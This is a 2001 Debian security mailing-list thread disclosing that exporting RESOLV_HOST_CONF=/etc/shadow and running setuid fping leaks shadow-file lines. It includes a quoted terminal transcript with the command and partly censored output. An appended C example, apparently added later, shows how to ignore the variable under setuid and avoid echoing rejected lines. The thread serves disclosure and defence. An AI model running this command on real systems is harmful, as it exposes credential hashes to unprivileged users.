Re[2]: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
When I tried it, I did not get the same results.
-rwsr-xr-x 1 root root 19728 Oct 30 1999 /usr/bin/fping*
ldd `which fping`
libc.so.6 => /lib/libc.so.6 (0x00127000)
/lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x00110000)
ping localhost
PING localhost (127.0.0.1): 56 data bytes
--- localhost ping statistics ---
6 packets transmitted, 0 packets received, 100% packet loss
fping localhost
localhost is unreachable
--
Kevin - cog@iwz.com
-- Original message --
> Since I've not had any response yet, I thought I'd give a demonstration of how
> nasty this is:
> Script started on Mon Jan 8 17:48:23 2001
> thomas@io:~$ export RESOLV_HOST_CONF=/etc/shadow
> thomas@io:~$ ping localhost
> PING localhost (127.0.0.1): 56 data bytes
> --- localhost ping statistics ---
> 2 packets transmitted, 0 packets received, 100% packet loss
> thomas@io:~$ fping localhost
> /etc/shadow: line 1: bad command `root:<censored>:11063:0:99999:7:::'
> [snip]
> /etc/shadow: line 73: bad command `gdm:!:11285:0:99999:7:::'
> localhost is unreachable
> thomas@io:~$ ls -l `which fping`
> -rwsr-xr-x 1 root root 19728 May 15 2000 /usr/bin/fping
> thomas@io:~$ ls -l `which ping`
> -rwsr-xr-x 1 root root 15036 Dec 31 04:11 /bin/ping
> thomas@io:~$ ldd `which fping`
> libc.so.6 => /lib/libc.so.6 (0x40021000)
> /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> thomas@io:~$ ldd `which ping`
> libc.so.6 => /lib/libc.so.6 (0x40021000)
> /lib/ld-linux.so.2 => /lib/ld-linux.so.2 (0x40000000)
> thomas@io:~$ exit
> Script done on Mon Jan 8 17:49:42 2001
> It seems to work for some setuid programs, but not others. I'm running the
> most recent packages from unstable as of today:
> ii libc6 2.2-9 GNU C Library: Shared libraries and Timezone
> ii netkit-ping 0.10-5 The ping utility from netkit
> ii fping 2.2b1-2 Send ICMP ECHO_REQUEST packets to network ho
> cheers,
> Thomas
> On Mon, 8 Jan 2001, thomas lakofski wrote:
>> From: thomas lakofski <thomas@88.net>
>> To: security@debian.org, debian-security@lists.debian.org
>> Date: Mon, 8 Jan 2001 13:34:52 +0000 (GMT)
>> Subject: 'export RESOLV_HOST_CONF= any file you want' local vulnerability
>>
>> Hi,
>>
>> A friend of mine just tried this against my unstable box and successfully
>> obtained the contents of /etc/shadow.
>>
>> I imagine that this is a problem in libc -- I'll leave it to
>> security@debian.org to file bug reports.
>>
>> cheers,
>>
>> Thomas
>>
>>
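The transcript above combines two behaviours: a setuid-root program lets RESOLV_HOST_CONF choose the file to parse, and the parser echoes every rejected line in its error message. The following C example is added here for illustration and is not code from this thread or from glibc; running_privileged, conf_path and parse_conf are hypothetical names, the keyword list is a simplified subset, and the sample input is constructed. It shows the defensive form of both behaviours: the override is ignored under setuid/setgid execution, and diagnostics carry only the file name and line number.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/auxv.h>

#define DEFAULT_CONF "/etc/host.conf"

/* Nonzero for setuid/setgid execution: the kernel sets AT_SECURE in that case. */
int running_privileged(void) { return getauxval(AT_SECURE) != 0; }
/* Hypothetical helper: honour the environment override only when unprivileged. */
const char *conf_path(const char *env_value, int privileged) {
    if (privileged || env_value == NULL || env_value[0] == '\0') return DEFAULT_CONF;
    return env_value;
}
static int known_keyword(const char *line) {
    static const char *kw[] = { "order", "multi", "trim", "nospoof", "reorder" };
    for (size_t i = 0; i < sizeof kw / sizeof kw[0]; i++) {
        size_t n = strlen(kw[i]);
        if (strncmp(line, kw[i], n) == 0 && (line[n] == ' ' || line[n] == '\t')) return 1;
    }
    return 0;
}
/* Hypothetical simplified parser; `text` stands in for the file's contents.
   Returns the number of bad lines and never echoes a rejected line into diag. */
int parse_conf(const char *name, const char *text, char *diag, size_t dlen) {
    int lineno = 0, bad = 0;
    size_t used = 0;
    if (dlen) diag[0] = '\0';
    while (*text) {
        size_t len = strcspn(text, "\n");
        char line[256];
        snprintf(line, sizeof line, "%.*s", (int)len, text);
        lineno++;
        if (line[0] != '\0' && line[0] != '#' && !known_keyword(line)) {
            bad++;
            if (used < dlen)
                used += snprintf(diag + used, dlen - used, "%s: line %d: bad command\n", name, lineno);
        }
        text += len + (text[len] == '\n');
    }
    return bad;
}
int main(void) {
    /* Constructed input shaped like a password-file line; not real data. */
    const char *sample = "order hosts,bind\nroot:CONSTRUCTED:11063:0:99999:7:::\n";
    char diag[512];
    const char *path = conf_path(getenv("RESOLV_HOST_CONF"), running_privileged());
    int bad = parse_conf(path, sample, diag, sizeof diag);
    printf("%s%d bad line(s) in %s\n", diag, bad, path);
    return 0;
}
```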